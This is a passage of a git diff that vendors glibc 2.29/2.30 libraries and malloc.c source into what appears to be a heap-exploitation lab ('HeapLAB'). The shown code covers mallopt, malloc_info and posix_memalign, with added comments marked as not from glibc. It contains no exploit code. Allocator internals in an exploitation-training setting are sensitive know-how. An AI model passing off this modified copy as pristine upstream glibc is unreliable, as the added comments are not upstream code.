+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
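+/*
+   Illustrative sketch, not from the glibc sources: malloc_stats() prints the
+   per-arena and total system/in-use byte counts computed by int_mallinfo
+   above to stderr, which makes it a quick way to eyeball heap growth.
+
+   #include <malloc.h>
+   #include <stdlib.h>
+
+   int main (void)
+   {
+     void *p = malloc (100000);
+     malloc_stats ();            // "Arena 0:", "system bytes", "in use bytes"
+     free (p);
+     return 0;
+   }
+*/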
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
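+/*
+   Illustrative sketch, not from the glibc sources: two mallopt calls that map
+   onto the switch above.  M_PERTURB makes allocation and free fill chunks
+   with a byte pattern, which helps expose reads of uninitialised or freed
+   memory, and M_MXFAST 0 disables fastbins entirely -- which is why the code
+   above consolidates before changing max_fast.
+
+   #include <malloc.h>
+   #include <stdlib.h>
+
+   int main (void)
+   {
+     mallopt (M_PERTURB, 0xaa);    // fill chunks on allocation and free
+     mallopt (M_MXFAST, 0);        // no fastbins from now on
+
+     free (malloc (32));
+     return 0;
+   }
+*/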
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
+
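+/*
+   Illustrative sketch, not from the glibc sources: the note above points out
+   that a MORECORE which always fails forces mmap to be used for every system
+   request.  With these glibc versions the same effect can be had at run time
+   through the legacy __morecore hook; glibc's MORECORE_FAILURE is 0, so the
+   replacement simply returns NULL.
+
+   #include <malloc.h>
+   #include <stddef.h>
+   #include <stdlib.h>
+
+   static void *no_morecore (ptrdiff_t increment)
+   {
+     return NULL;                  // always report MORECORE failure
+   }
+
+   int main (void)
+   {
+     __morecore = no_morecore;     // install before the first allocation
+     free (malloc (32));           // heap now lives in an mmapped region
+     return 0;
+   }
+*/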
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
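+/*
+   Illustrative sketch, not from the glibc sources: unlike memalign,
+   posix_memalign reports problems through its return value and additionally
+   requires the alignment to be a power-of-two multiple of sizeof (void *),
+   exactly as checked in the wrapper above.
+
+   #include <stdio.h>
+   #include <stdlib.h>
+
+   int main (void)
+   {
+     void *p = NULL;
+     int err = posix_memalign (&p, 64, 1000);
+     if (err != 0)                 // EINVAL or ENOMEM
+       {
+         fprintf (stderr, "posix_memalign failed: %d\n", err);
+         return 1;
+       }
+     free (p);
+     return 0;
+   }
+*/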
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
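+/*
+   Illustrative sketch, not from the glibc sources: malloc_info writes the XML
+   document assembled above to the given stdio stream; the options argument
+   currently has to be 0.
+
+   #include <malloc.h>
+   #include <stdio.h>
+   #include <stdlib.h>
+
+   int main (void)
+   {
+     free (malloc (1000));
+     return malloc_info (0, stdout);   // <malloc version="1"> ... </malloc>
+   }
+*/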
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/ld-2.29.so b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/ld-2.29.so
new file mode 100755
index 0000000..b5c4af5
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/ld-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/libc-2.29.so b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/libc-2.29.so
new file mode 100755
index 0000000..2f5acd8
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/libc-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld-2.29.so b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld-2.29.so
new file mode 100755
index 0000000..0344b0e
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld.so.2 b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld.so.2
new file mode 120000
index 0000000..1b67396
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld.so.2
@@ -0,0 +1 @@
+ld-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc-2.29.so b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc-2.29.so
new file mode 100755
index 0000000..abf6515
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc.so.6 b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc.so.6
new file mode 120000
index 0000000..89bb464
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc.so.6
@@ -0,0 +1 @@
+libc-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30/ld-2.30.so b/HeapLAB/.glibc/glibc_2.30/ld-2.30.so
new file mode 100755
index 0000000..a3af14f
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.30/ld-2.30.so differ
diff --git a/HeapLAB/.glibc/glibc_2.30/ld.so.2 b/HeapLAB/.glibc/glibc_2.30/ld.so.2
new file mode 120000
index 0000000..694f035
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30/ld.so.2
@@ -0,0 +1 @@
+ld-2.30.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30/libc-2.30.so b/HeapLAB/.glibc/glibc_2.30/libc-2.30.so
new file mode 100755
index 0000000..cb9fcaa
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.30/libc-2.30.so differ
diff --git a/HeapLAB/.glibc/glibc_2.30/libc.so.6 b/HeapLAB/.glibc/glibc_2.30/libc.so.6
new file mode 120000
index 0000000..a5e9e38
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30/libc.so.6
@@ -0,0 +1 @@
+libc-2.30.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.30/malloc/malloc.c
new file mode 100644
index 0000000..00ce48c
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30/malloc/malloc.c
@@ -0,0 +1,5589 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2019 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
